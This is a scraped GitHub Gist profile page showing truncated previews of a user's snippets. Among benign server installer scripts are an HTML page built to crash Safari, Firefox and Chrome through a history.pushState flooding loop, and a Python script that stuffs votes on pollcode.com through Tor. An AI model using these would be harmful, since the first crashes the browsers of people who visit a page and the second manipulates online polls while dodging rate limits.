Skip to content

Instantly share code, notes, and snippets.

View Saleh7's full-sized avatar
✈️
I'm flying!

~/Saleh Saleh7

✈️
I'm flying!
View GitHub Profile
<!DOCTYPE html>
<html>
<!-- https://github.com/Saleh7 -->
<body>
<h1>Crash Safari - Firefox - Chrome</h1>
<script>
var total = "";
for( var i = 0; i < 100000; i++ ) {
total = total + i.toString();
history.pushState(0,0, total );
#!/bin/bash
# Vesta Ubuntu installer v.05
#----------------------------------------------------------#
# Variables&Functions #
#----------------------------------------------------------#
export PATH=$PATH:/sbin
export DEBIAN_FRONTEND=noninteractive
RHOST='apt.vestacp.com'
@Saleh7
Saleh7 / pull.py
Created November 17, 2016 07:49
Fake voting pollcode.com :( requests using Python over Tor
import time, os, requests
num = input( "\x1b[1;31;50m How many poll:\x1b[0m" )
if(int(num)):
def pollcode():
Proxy = {
'http' : "socks5://127.0.0.1:9050",
'https' :"socks5://127.0.0.1:9050"
}
Post = {'answer': '3'} # change answer
@Saleh7
Saleh7 / lemp16.4.sh
Created June 19, 2016 09:36
Auto Install and Setup LEMP for Ubuntu 16.04 (PHP7, Nginx, MySql, PhpMyAdmin)
#!/bin/sh
# Auto Install and Setup LEMP #
#Example:sudo bash lemp16.4.sh -p MyPassword
# By Saleh7 - https://github.com/Saleh7
E=`tput setaf 1`
G=`tput setaf 2`
A=`tput setaf 3`
C=`tput setaf 6`
B=`tput bold`
@Saleh7
Saleh7 / postfix-dovecot.sh
Created July 9, 2016 03:57
Ubuntu 14.04 Server Automated Bash script install and configure / Postfix / Dovecot / with mysql https://github.com/Saleh7/Scripts/blob/master/postfix-dovecot.sh
#!/bin/sh
#################################################################################
# Ubuntu 14.04 LTS Server #
# Automated Bash script install and configure / Postfix / Dovecot / with mysql #
# By https://github.com/Saleh7 #
# https://github.com/Saleh7/Scripts/blob/master/postfix-dovecot.sh #
#################################################################################
# Edit here ..
mysqlPass='PasswordRoot' # mysql root password here